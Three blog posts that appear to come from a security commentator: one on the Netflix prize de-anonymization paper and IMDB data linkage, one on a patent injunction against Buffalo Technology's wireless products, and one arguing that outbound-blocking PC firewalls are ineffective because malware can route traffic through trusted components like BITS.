Netflix prize data and the meaning of anonymity

Last week a paper from University of Texas titled How to break anonymity of the Netflix data-set was Slashdotted. In the ensuing discussion parallels were drawn to the release of AOL search data and asking whether this would finally put the kabash on any future release of user data for research purposes. The results are very interesting but do not quite point to such a drastic conclusion. In particular the notion of “anonymity” used in this paper, satisfactory from a mathematical point of view, is not consistent with the operable definition most users operate under.

To recap: In 2006 Netflix announced a one-million dollar prize to improve its recommendation service. The problem is deceptively simple to state: given past movie-ratings from a user, suggest other movies he/she will enjoy. This is a standard collaborative-filtering and machine learning problem. The solutions depend on access to massive amounts of training data. More data allows the algorithms to better understand user-data at very nuanced level and improve its predictions. Netflix was up to the challenge, releasing a very large data-set containing 100 million ratings from half-million users– almost one out of eight customer at the time. This data-set was “anonymized” according to the Netflix definition. Customers were identified by numbers only, no names, no personally-identifiable information or even demographic data– such as age, gender, education etc. which may actually have been useful for predictions.

On the surface, the new paper shows that in fact user can be identified from this stripped down data– this is the interpretation which fueled the Slashdot speculation. Reality is more complex: the main quantitative result from the paper is that movie-ratings for an individual are highly unique. No two people have similar ratings. (The data-set is “sparse” to use the proper language.) In fact they are so unique that there is unlikely to be two people who agree on their ratings for even a handful of movies. This effect is even more pronounced when the movies are more obscure– knowing that a user watched an obscure Ingmar Bergman movie sets them apart from the crowd.

Looked another way: suppose there is a large source of movie ratings, as in the Netflix prize data-set. If the goal is to locate a particular user whose identity has been masked, getting hold of just a few of their ratings from another source will be enough. Even among millions of users, there is unlikely to be a second person with the exact same tastes. In some ways this is intuitive but the important contribution of the paper is quantifying the effect and calculating exactly how much data is required for unique identification with high confidence. Answer: less than a dozen movie ratings, less if the movies are obscure or the dates the user watched the movie is also available– indirectly this is in the Netflix data set as the data the user provided a rating.

“From another source” is the critical caveat above. In the paper this is referred to as the auxilary data source. What the paper demonstrates is that the Netflix data set can be linked to another data-set. Linking can be a serious privacy problem: it allows aggregating information from different databases. If a database existed where personally identifiable information was stored along with a small number of movie ratings, that record could be matched against the Netflix data. That is the catch: there is no such database. As the auxiliary for mounting the attack, the paper uses Internet Movie Database or IMDB, where users volunteer movie reviews. That allows correlating the data on IMDB for that user with all the other ratings from Netflix.  As for the typical user profile on IMDB, the registration page asks for email address, gender,  year of birth, zipcode and country– all of them volunteered by the user and subject to no validation. This is the “90210” phenomenon: any time data is mandatory without good reason and no  way to enforce accuracy, the service provider ends up with many people named “John Smith” living in Hollywood, zip-code 90210, CA. That means the effect of linking IMDB and Netflix data is to discover that user nicknamed Mickey Mouse is a fan of Disney movies. Unless the user volunteered any more data to IMDB, the correlation does not get us any closer to that subscriber’s identity offline. All of the arguments about inferring sensitive information from movie ratings still hold (for example political affiliation based on their responses to a controversial documentary) but the data is now associated with user “MickeyMouse” instead of user #1234 in the original source. A step closer to identification? Perhaps. Fully identified? Not even close.

By itself the Netflix data set is not dangerous. That is a sharp contrast from the earlier AOL search data disaster: search history is sufficient, on its own to uniquely identify users because individuals enter private information into search queries such as their legal name or address. More important there is no limit to what search logs can contain: queries for health-conditions could be used to infer medical data, search for news may suggest professional interests etc.

cemp

Buffalo Technology is latest target of IP litigation

Visitors looking for wireless products on the Buffalo Tech. website will instead see this message:

Regrettably, the Court of Appeals has decided not to stay the injunction in the CSIRO v. Buffalo et al litigation during the appeal period. Although Buffalo is confident that the final decision in the appeal will be favorable and that the injunction will be lifted, Buffalo is presently unable to supply wireless LAN equipment compliant with IEEE 802.11a and 802.11g standards in the United States until that decision is issued.

Fortunately this does not impact customers who already bought devices. Manuals and firmware updates are still available even for the verboten product lines. Interesting enough the injunction only covers A and G devices so a pure draft-N router would still qualify in principle. But since all the draft-N routers also have A/B/G support for backwards compatibility, this stops Buffalo from shipping any wireless product for all intents and purposes. It’s not clear what the impact on the company will be. They have a diversified line of products including external drives, network-attached storage and even multimedia but the current litigation might even affect some of those devices such as wireless print servers.

cemp

Security theater, act#48: outbound blocking firewalls for PCs

Users running XP SP2, Vista or even a third-party firewall client such as ZoneAlarm have probably seen this warning: “… such and such program attempted to make a connection to the Internet and was blocked.” This is supposed to create a warm-and-fuzzy feeling for users. Here is messaging indicating that some shady application running on your computer attempted to do something sketchy, but the clever security system caught it and prevented harm. The reality is a bit different.

First to be clear: firewalls are very important for defense-in-depth. (Although there are alternative security paradigms such as the Jericho forum that seeks to dispense with them altogether.) Main function of a firewall is to block inbound connections, in other words stop other computers “out there” in the wild-wild web from attempting to access resources on the machine “here.” The firewall used this way is the first line of defense; even when the access attempt seems harmless– “surely it would be denied!”– there is no reason to take risks. Exploitable bugs in the access-control software have caused machines to be compromised simply by connecting to them. The further upstream one can detect and

But outbound blocking is an altogether different function. In this case, there is some software already running inside the trusted boundary, admitted into the inner sanctum. The firewall in this case prevents that code from communicating with the outside world. What purpose does that serve? With the exception of parental controls– which is rarely the intended effect– the answer is “not much.” The reason is that blocking assumes malicious intent on the part of the application. Perhaps it is trying to connect to some nefarious host out there and do something dubious, such as ship private user documents off to Russia or download more malware.  The problem is once malicious code is running with the same privilege as user, it is very hard to cut off all of the communication channels to the outside world for one basic reasons: processes and applications do not have strong identity.

While the host-based firewall attempts to create the illusion that application X is highly-regarded and application Y is not to be trusted  with talking to the outside world, in reality it has a very hard time sorting out between them. This is because applications are not intended to be an isolation boundary in an operating system. They are not protected against each other. Simple example: if Y is not allowed to open outbound connection, it can often launch a copy of X to do the same thing instead or prior to Vista subvert the internal workings of X. For “X” substitute Internet Explorer– launching a URL is sending information to a website. In fact malware authors already implemented a more reliable form of this strategy: when they need to phone home, for say downloading a new copy of the botnet software, they use the Background Intelligent Transfer System (BITS) as documented by Symantec. BITS is a trusted operating-system component and has no problem by-passing the firewall, even when acting under orders from malware. There was a minor stir around this when news initially surfaced, including articles at the Register and BBC.  In fact it should have been greeted with a yawn were it not for the firewall itself setting unrealistic expectations around what can be accomplished in the way of outbound blocking.

cemp